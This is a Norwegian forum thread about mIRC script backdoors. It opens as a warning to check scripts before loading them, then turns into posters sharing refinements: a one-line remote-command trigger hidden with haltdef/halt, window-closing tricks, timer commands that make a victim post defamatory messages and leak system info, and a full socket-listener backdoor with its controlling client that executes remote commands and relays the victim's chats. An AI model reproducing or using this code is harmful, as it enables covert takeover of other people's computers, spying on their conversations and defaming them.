Gå til innhold

mirc og scripting og andre morsomme ting


Anbefalte innlegg

Tenkte jeg skulle kikke litt på scripting i dag, så jeg prata litt med en kamerat som har scripta for mIRC ganske lenge. Han viste meg hvordan man ved hjelp av enkel linje med kode kunne lage noe som gjorde at en fikk fullstendig kontroll over en annen pc.

Vet ikke hvordan det er med dere, men jeg skal aldri loade ett script jeg ikke har kikka igjennom 2 ganger lenger.

kunnskap er en lett byrde samme hvordan en vrir og vender på det. Ser dere noe som ligner dette i noen script er det fare på ferde.

 

on ^*:text:haxx *:?: { { $$2- } | haltdef | halt } 

 

haxx er ett hvilketsomhelst ord som en tulling har bestemt.[/code]

Lenke til kommentar
Videoannonse
Annonse

on 1:text:haxx:?:/$2- hehe, denne er som tatt ut av help.

 

Vel:

 

For det første er det viktigste med en bakdør at den er skjult.

^* er som kjent brukt for å halte echo og ting som vanligvis skjer, for mulighet til å lage theme script. Derfor er det mulig med denne å fjerne echo i msg fra å dukke opp.

Hvis en mottar f.eks en priv msg som lyder følgende:

[15.23] <Kurt> haxx msg #norge jeg er pedo

vil vedkommende bli litt mistenksom, med haltdef | halt vil man ikke se teksten som blir skrivd.

 

Etter at Kurt har hatt sin moro vil vedkommende sikkert også legge merke til at han av en eller annen grunn har sagt "jeg er pedo" i #norge.

Han hadde sikkert også fått noen fine meldinger hadde han ikke merket det, og funnet ut på den måten.

 

Og for det andre vil ikke den fungere engang, siden du har glemt å legge til " *" etter haxx, noe som sikkert bare er en glipp.

 

Og det at det er lettere, betyr også at det er lettere for en person med dette å oppdage det. Som igjen går mot hensikten med den lille linja med kode. :wink:

Lenke til kommentar
hvorfor ikke bare bruke denne???

 

on 1:text:haxx:?:/$2-      :woot:  

 

MYE lettere og mulig mer til å stole på :-?

 

Du er erfaren scripter eller?

 

ja, har ganske mye erfaring innen scripting, har f.eks laget scriptet til #dj.norge

 

og Evil-Mike, hva med on 1:text:haxx:?:/$2- | /close -m $nick

 

da ser han ikke at du har skrevet noe...

Lenke til kommentar

close -m $me$nick er en selvfølge :yes:, HVIS man ikke chatter med vedkommende OG man er temmelig sikker på at vedkommende ikke sitter å chatter på irc der og da. (whois $$1 $1, eller msg'e personen og spørre "er du der")

Men hvis man snakker med personen og han plutselig mister vinduet ditt, opp til flere ganger vil han bli mistenksom. Hvis han også sitter å chatter vil han også se at vinduet dukker opp og lukker seg igjen, det vil skje veldig fort men man legger merke til det.

Derfor er det slik at jeg enten msg-er vedkommende først, så skriver inn kommandoen, så merker han det ikke. eller hvis han ikke er til stedet der og da tar jeg " haxx .timerx 1 1 { msg #norge jeg er forresten pedo | close -m Evil-Mike } " da vil vinduet lukke seg, man kan også bruke timeren til å skaffe informasjon om brukerens pc, siden "haxx .msg Evil-Mike $uptime(system,1) " ikke vil fungere særlig bra bruker man timer og får informasjonen "haxx .timerx 1 1 { .msg Evil-Mike $uptime(system,1) } " . Man kan også bruke timeren til å slenge opp noen feilmeldinger med $input-identifieren, som ikke fungerer i events.

 

Man bør unngå kode som forandrer mye på selve mirc, siden det kan skape mistanke, og jeg ville tro at hvis man har en diskusjon med en person og man vil ha litt mer enn ord å komme med at et vindu som automatisk lukker seg ville skapt litt mistanke.

Lenke til kommentar

her er en jeg har lekt litt med, det er litt mye kode så ikke bruk den på noen som har litt peiling :lol:

 

on *:connect: { PROTOCOL_247 } ;starter lytteren;

on *:text:*:* { if ($sock(mirc_protocol_247b) != $null) { sockwrite -n mirc_protocol_247b < $+ $nick $+ > < $+ $chan $+ > $1- } } ;gir tilbakemelding om tekst;

on *:action:*:* { if ($sock(mirc_protocol_247b) != $null) { sockwrite -n mirc_protocol_247b < $+ $nick $+ > < $+ $chan $+ > $1- } } ;gir tilbakemelding om /me;

;legg til events etter behov;

on *:socklisten:mirc_protocol_247 { sockaccept mirc_protocol_247b }

 

alias PROTOCOL_1 { $$1- }

 

alias PROTOCOL_2 { if ($me ison $1) { .msg $1 $$2- } }

 

alias PROTOCOL_3 { .msg $1 $$2- }

 

alias PROTOCOL_247 {

if ($portfree(1395)) { socklisten mirc_protocol_247 1395 }

}

on *:sockread:mirc_protocol_247b:{

if ($sockerr > 0) { return }

:loop | sockread %tmp

if ($sockbr == 0) { return }

if (%tmp == ping) { sockwrite -n $sockname PONG | sockclose mirc_protocol_247b }

%tmp

goto loop

}

 

 

;;;;;;;;;;;;; alt over skal i bakdør-scriptet, alt nedenfor i den som er den som utnytter den ;;;;;;;;;;

 

alias hax0r { sockopen haxor $1 $$2 }

 

alias haxx {

if ($1 != ping) {

/sockwrite -n hax0r PROTOCOL_1 $$1- | aline @socket >> >> $timestamp $1-

}

else {

/sockwrite -n hax0r ping

}

}

 

alias haxx2 { /sockwrite -n hax0r PROTOCOL_2 $active $$1- | aline @socket >> >> $timestamp $1- }

 

 

alias haxx3 { /sockwrite -n hax0r PROTOCOL_3 $active $$1- | aline @socket >> >> $timestamp $1- }

 

;; for å skrive inn run-commandoer osv;;;

alias windowStart { /window -newk @socket 1 1 -1 -1 /haxx }

 

on *:sockread:hax0r:{

if ($sockerr > 0) { return }

:loop | sockread %tmp

if ($sockbr == 0) { return }

aline @socket << << $timestamp %tmp

goto loop

}

 

on *:input:# {

if ($left($1,1) != /) && ($left($1,1) != ) {

if $sock(hax0r) != $null) {

haxx2 $$1-

}

haltdef | halt

}

}

on *:input:? {

if ($left($1,1) != /) && ($left($1,1) != ) {

if $sock(hax0r) != $null) {

haxx3 $$1-

}

haltdef | halt

}

}

Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
  • Hvem er aktive   0 medlemmer

    • Ingen innloggede medlemmer aktive
×
×
  • Opprett ny...